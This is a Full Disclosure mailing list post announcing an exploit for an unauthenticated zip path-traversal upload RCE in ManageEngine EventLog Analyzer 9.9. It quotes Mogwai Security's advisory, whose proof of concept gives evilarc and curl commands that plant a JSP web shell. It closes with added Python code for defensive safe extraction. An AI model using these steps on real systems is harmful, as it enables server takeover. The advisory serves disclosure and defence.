
Full Disclosure mailing list archives
[The ManageOwnage Series, part IV]: RCE / file upload in Eventlog Analyzer, feat. special guests h0ng10 and Mogwai Security
From: Pedro Ribeiro <pedrib () gmail com>
Date: Mon, 1 Sep 2014 08:20:30 +0100
Hi all,

h0ng10 from Mogwai Security has found a file upload leading to RCE in Eventlog Analyzer (see advisory below for a snippet or go to http://seclists.org/fulldisclosure/2014/Aug/86). h0ng10 communicated this over a year ago to ManageEngine but they failed to fix it.

When I found and communicated the same vulnerability to ManageEngine a week ago, they accepted my report as valid and said they would look into it. There was no mention of h0ng10's previous discovery, so I don't know what they did with it - perhaps they "lost" or "misplaced" it?

Anyway, I had an exploit ready for when they fixed it, but since the vulnerability information is out, I'm releasing the exploit today. The exploit credits h0ng10 as the original vulnerability discoverer and can be found at:

https://github.com/rapid7/metasploit-framework/pull/3732

This will hopefully be integrated in Metasploit soon. The exploit has been thoroughly tested on many Windows and Linux versions.

Thanks to h0ng10 and Mogwai Security for featuring in the ManageOwnage Series!

Regards,
Pedro

On 31 August 2014 16:39, Advisories <advisories () mogwaisecurity de> wrote:
Mogwai Security Advisory MSA-2014-01
----------------------------------------------------------------------
Title: ManageEngine EventLog Analyzer Multiple Vulnerabilities
Product: ManageEngine EventLog Analyzer
Affected versions: EventLog Analyzer 9.9 (Build 9002) on Windows/Linux
Impact: critical
Remote: yes
Product link: http://www.manageengine.com/products/eventlog/
Reported: 18/04/2013 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)

Vulnerability description:
----------------------------------------------------------------------
1) Unauthenticated remote code execution

ME EventLog Analyzer contains an "agentUpload" servlet which is used by Agents to send log data as zip files to the central server. Files can be uploaded without authentication and are stored/decompressed in the "data" subdirectory. As the decompress procedure is handling the file names in the ZIP file in an insecure way, it is possible to store files in the web root of the server. This can be used to upload/execute code with the rights of the application server.

Proof of concept:
----------------------------------------------------------------------
1) Unauthenticated remote code execution

- Create a malicious zip archive with the help of evilarc[1]

  evilarc.py -d 2 -o unix -p webapps/event cmdshell.jsp

- Send the malicious archive to the agentUpload servlet

  curl -F "payload=@evil.zip" http://172.16.37.131:8400/agentUpload

- Enjoy your shell

  http://172.16.37.131:8400/cmdshell.jsp

A working Metasploit module will be released next week.
----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)
info () mogwaisecurity de
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
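The root cause in the advisory above is a decompression routine that trusts the file names inside an uploaded ZIP, so an entry such as "../../webapps/event/x.jsp" is written under the web root instead of the "data" directory. The following Python is an added example, not code from the advisory, from Pedro's message or from the ManageEngine product: it shows the per-entry containment check such a routine needs, exercised against a constructed archive that mixes a legitimate agent log with one traversal entry (placeholder text, not a payload). The directory layout and entry names are assumptions for the demo.

```python
import io
import os
import tempfile
import zipfile
from typing import List, Tuple


def safe_extract(zip_bytes: bytes, dest_dir: str) -> Tuple[List[str], List[str]]:
    """Extract zip_bytes into dest_dir, refusing any entry whose resolved path
    falls outside dest_dir. Returns (extracted_names, rejected_names)."""
    dest_root = os.path.realpath(dest_dir)
    extracted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            # ZIP names should use '/', but some Windows tools emit '\'.
            name = info.filename.replace("\\", "/")
            target = os.path.realpath(os.path.join(dest_root, name))
            # Containment check: absolute names and '..' escapes resolve
            # outside dest_root and are dropped instead of written.
            inside = target == dest_root or target.startswith(dest_root + os.sep)
            if os.path.isabs(name) or not inside:
                rejected.append(info.filename)
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with zf.open(info) as src, open(target, "wb") as dst:
                    dst.write(src.read())
            extracted.append(info.filename)
    return extracted, rejected


def build_sample_zip() -> bytes:
    """Constructed sample upload: one normal agent log plus one traversal
    entry of the shape a tool like evilarc produces (content is placeholder)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("agent-logs/syslog-2014-08-31.log", "constructed log line\n")
        zf.writestr("../../webapps/event/placeholder.jsp", "placeholder text\n")
    return buf.getvalue()


def demo() -> Tuple[List[str], List[str]]:
    """Extract the sample into an assumed <tmp>/data directory, mirroring the
    advisory's 'data' subdirectory, and confirm nothing escaped it."""
    with tempfile.TemporaryDirectory() as tmp:
        data_dir = os.path.join(tmp, "data")
        os.makedirs(data_dir)
        result = safe_extract(build_sample_zip(), data_dir)
        escaped = os.path.realpath(os.path.join(data_dir, "../../webapps/event/placeholder.jsp"))
        assert not os.path.exists(escaped), "traversal entry was written outside data/"
        return result
```

Running demo() returns the legitimate log as extracted and the traversal entry as rejected; in a real deployment the rejected names are also worth logging, since an agent never has a reason to send them.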